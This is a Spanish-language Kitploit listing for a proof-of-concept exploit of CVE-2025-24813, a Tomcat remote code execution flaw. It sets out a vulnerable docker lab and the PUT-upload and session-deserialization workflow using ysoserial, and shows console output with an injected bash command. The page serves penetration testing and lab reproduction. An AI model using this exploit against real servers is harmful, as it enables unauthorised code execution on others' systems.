Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24813 — Script de Prueba de Concepto (PoC) para CVE-2025-24813, vulnerabilidad en Apache Tomcat. | Kitploit
Herramientas/GitHubGitHub/hakankarabacak/cve-2025-24813
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

Script de Prueba de Concepto (PoC) para CVE-2025-24813, vulnerabilidad en Apache Tomcat.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24813

Script de Prueba de Concepto (PoC) para CVE-2025-24813, vulnerabilidad en Apache Tomcat.

El script ha sido modificado basándose en el enlace relacionado y adaptado a mis necesidades.

Configuración del Entorno Tomcat Vulnerable

Entorno basado en la imagen oficial de Tomcat 9.0.90. Elimina la restricción de solo lectura del servidor y lo configura para guardar los datos de sesión en disco. Luego, despliega automáticamente la aplicación copiando el archivo ROOT.war en el directorio webapps/ de Tomcat.

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

Flujo de trabajo

  1. Se coloca un archivo check.txt con la cabecera Content-Range para verificar si el servidor acepta solicitudes PUT.
  2. Si el servidor es escribible, se genera un payload para el comando deseado usando ysoserial.
  3. El archivo de sesión malicioso se sube al directorio mediante una solicitud PUT, vinculándolo al ID de sesión y al nombre de archivo.
  4. Se envía una solicitud GET con un JSESSIONID personalizado, lo que desencadena la deserialización.
  • El archivo de payload temporal se elimina del directorio.
  • Uso

    root@kitploit:~
    $ python3 cve_2025_24813.py
    
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
     
                     --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---
    
    Enter target URL (e.g., http://target.com:8080): http://target.com:8080
    Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
    Enter path to ysoserial.jar (default: ysoserial.jar): 
    Enter ysoserial gadget chain (default: CommonsCollections6): 
    [*] Session ID: hk1337
    [+] Server is writable via PUT: http://target.com:8080/check.txt
    [*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
    [+] Payload generated successfully: payload.ser
    [+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
    [+] Exploit succeeded! Server returned 500 after deserialization.
    [+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
    [+] Temporary file removed: payload.ser
    

    PoC

    https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

    Descargar herramienta